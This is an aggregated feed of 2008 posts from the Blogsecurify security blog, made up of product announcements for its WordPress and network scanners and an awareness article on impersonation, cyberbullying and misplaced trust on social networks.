In the past week Wordpress has updated their latest version to 2.6.3. Noticing this I decided to have Blogsecuify scan out my blog again. After about 30sec Blogsecuify checked and found that I was not running the latest version of Wordpress. So far this has been a great utility. 

One thing I would like to see is an upgrade of the icons. So far I have only seen caution icons next to string of text, sometimes these strings of text end in Excellent. I think maybe a green, yellow and red icon patter might be a nice upgrade. 

Thanks for all the heard works.
JimShoe


Smear of the Year
Mon, 27 Oct 2008 10:29:00 -0700
The high volume of recent smear campaigns has led to the need of a special acknowledgment.
 Spin Hunters is eager to rate the most popular cases of reputation attacks in the last year. Whether this will be the hysterical speculations over the upcoming election or the intensive rumors about the crush of a big financial institution, it is up to you decide. Therefore if you suspect that some of the current affairs are part of a malicious Black PR plot or you know this for sure, please submit your nominations by emailing us. At the end of the year, we will honor the most over-hyped stories by giving them a special award and public rebuke.
---
gnucitizen information security gigs part of the cutting-edge network:
No active items found!
GNUCITIZEN Content Survey
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious



Netsecurify Screenshots
noreply@blogger.com (pdp) — Sun, 26 Oct 2008 02:10:00 -0700
        



Try Netsecurify
noreply@blogger.com (pdp) — Mon, 20 Oct 2008 06:11:00 -0700
The Netsecurify service is still in private-beta which means that we are only offering it for free to our friends, our clients and selected members of the public. We are also willing to open it for prime time use to organizations with low security budget, charity organizations and others who might be in need. Please, get in touch with us if you want to try it out.


WP Blogsecurify Wordpress Security Plugin
noreply@blogger.com (pdp) — Mon, 20 Oct 2008 05:27:00 -0700
It is finally out! Now you can download WP Blogsecurify Wordpress Security Plugin. Check out the GNUCITIZEN Laboratory.

WP Blogsecurify is a security plugin for Wordpress designed to integrate several simple but important security patches for the popular blogging platform. This plugin was developed by the Blogsecurify team - a special division of GNUCITIZEN Information Security Think Tank.

WP Blogsecurify protects your blog by:
forcing users to login over a secure communication channel.
protecting session identifiers from incidental session leaks.
hiding database errors which could be caused by malfunctioning plugins.
protecting the entire user session from session-hijacking attacks.
This plugin is designed to be simple and effective. Future versions will protect against SQLI and XSS attacks. We are also planning to integrate WP Blogsecurify with our free social media security testing engine.


Exploiting trust in social networks
noreply@blogger.com (Tom) — Fri, 03 Oct 2008 18:05:00 -0700


This is the first in a series of articles on Blogsecurify regarding the security of social networks and social media. In this article I will specifically talk about exploiting trust in social networks. My interest in social network/media security started several months ago when I put together a presentation on what many believe in the security community as the "top 5" threats to social networks. You can read more about the presentation on my blog, spylogic.net.

The threats we will discuss in this article are "evil twin" attacks, cyberbullying and cyberstalking as they relate to the trust model of social networks. Lets be honest, it's trivial to exploit trust in social networks. Why? There is no form of real authentication on any social network such as Facebook, MySpace, LinkedIn and Twitter (to name just a few). You can impersonate anyone, become someone new or hijack the profile of another existing user with very little skill. Create a profile, make up an identity to include birth date, relationship status, goals and dreams. Guess what? You are welcomed into the community with a complete profile that was never authenticated or verified as real. This can lead to leveraging and exploiting multiple levels of trust for malicious purposes.

Interestingly enough the only thing to deter you from creating a fake profile or assuming the identity of someone else are the "terms of use" of the various social media companies. Most state that you must be a real person and you can't impersonate someone else. Take the Facebook terms of use for example:
"You agree not to use the Service or the Site to...impersonate any person or entity, or falsely state or otherwise misrepresent yourself, your age or your affiliation with any person or entity..."
Problem is...since when do attackers follow policies and terms of use?

The "evil twin" attack is where an attacker takes on the persona or identity of a real person. This real person could be a celebrity or someone like a CEO or CFO of a major corporation. Becoming the identity of the victim gives you access to friends and associates that now trust you since they think you are that person. Once you have access to a high value target profile you can potentially have access to lots of personal information...information that in some cases could allow you to conduct a password reset attack with the victims web mail account (like what happened to Sarah Palin) as one example. It would be even more advantageous using this profile to target the victims friends as well. Why not...they trust you right?

Further manipulation of trust relationships leads to a whole slew of social engineering scenarios with various goals that an attacker could accomplish. The list may possibly be endless as the only limit to these types of attacks is the creativity of the attacker. Keep in mind that social engineering used as a way to attack people on social networks is not new by any means. Take for example the recent highly publicized Megan Meier "cyberbullying" case where an adult female posed as a teenage boy to literally destroy the life of another teenager. Megan committed suicide because of an attack that took very little skill to complete, yet had a life ending impact to the victim. We also see many different stories of cyberbullying/stalking in the mainstream media. Teens picking on teens, harassment of teachers, sexual predators, as well as manipulating relationships to damage the reputation of others are popular trends. The list goes on and these problems are only getting worse.

If you are reading this you are most likely in the security community and you "get it". You know not to trust anything or anybody on the Internet let alone social networks with your personal information. If you do allow access to your personal information then you probably know the risks and accept them. However, the people not reading this article are the ones that "don't get it", and we are talking about the majority social network users. This includes your non-security friends, family and the general public.

So why don't the various social networks do something about this and educate their user base? The social networks will never promote using social networks safely. Why? Because the more information you share with them, the more valuable you are! It was estimated a few years ago when News Corp purchased MySpace the average user of MySpace at that time was worth approximately $27 each! Could you imagine the financial impact to the social network companies if every user started to lock down or not give away private information contained in these networks?

I'm not suggesting to not use social networks but the key here is for us to educate the users of social networks that "don't get it". They should know that any information posted should always be considered public and if you do need to share personal information be very cautious about posting it. Trust in social media? There is no trust, this trust is implied and given.

At the end of this month (ironically October is security awareness month) I will be releasing a Facebook Privacy & Security Guide which documents the recommended privacy and security settings you should use while still being able to use the "social" aspects of Facebook. I also include tips that can be used with any social media application to enhance your security and privacy. The guide is short and easy to distribute. I encourage it to be shared with those that "don't get it". :-)

The next article in this series will talk about the security (or lack of security) of applications, widgets and anything else that can be added by a third-party to social network profiles.



Recruiting
noreply@blogger.com (pdp) — Thu, 25 Sep 2008 02:12:00 -0700
We have started the recruiting process at GNUCITIZEN. Follow the blog for more updates.


Beginning
noreply@blogger.com (pdp) — Thu, 11 Sep 2008 05:49:00 -0700
Today is the day. Netsecurify officially launches today.


The Framework is There
noreply@blogger.com (pdp) — Thu, 31 Jul 2008 04:18:00 -0700
The framework is there. It is live. Now we are using a powerful scaffolding logic which will enable us to expand without much overhead. The testing API is coming soon.


Starting Websecurify
noreply@blogger.com (pdp) — Thu, 26 Jun 2008 03:29:00 -0700
Starting work on Websecurify.


Official Launch
noreply@blogger.com (pdp) — Sun, 22 Jun 2008 10:48:00 -0700
The official launch of Blogsecurify will take place on Monday 23th of June.


Soon to Expect
noreply@blogger.com (pdp) — Fri, 20 Jun 2008 03:38:00 -0700
Soon to expect Websecurify...


Blogsecurify Promo Video
noreply@blogger.com (pdp) — Thu, 19 Jun 2008 08:06:00 -0700
Enjoy the promo video!




Looking for Bloggers
noreply@blogger.com (pdp) — Thu, 19 Jun 2008 07:31:00 -0700
Although, this project is primary oriented towards the online security testing tool, I am welcoming anyone who is willing to become an Blogsecurify active blogger to get in touch with us. It could turn to be an excellent opportunity to start your online career. And it is fun!


Welcome
noreply@blogger.com (pdp) — Thu, 19 Jun 2008 07:05:00 -0700
This is the official blog of Blogsecurify. Here we will post further updates regarding our online tool. Stay tuned.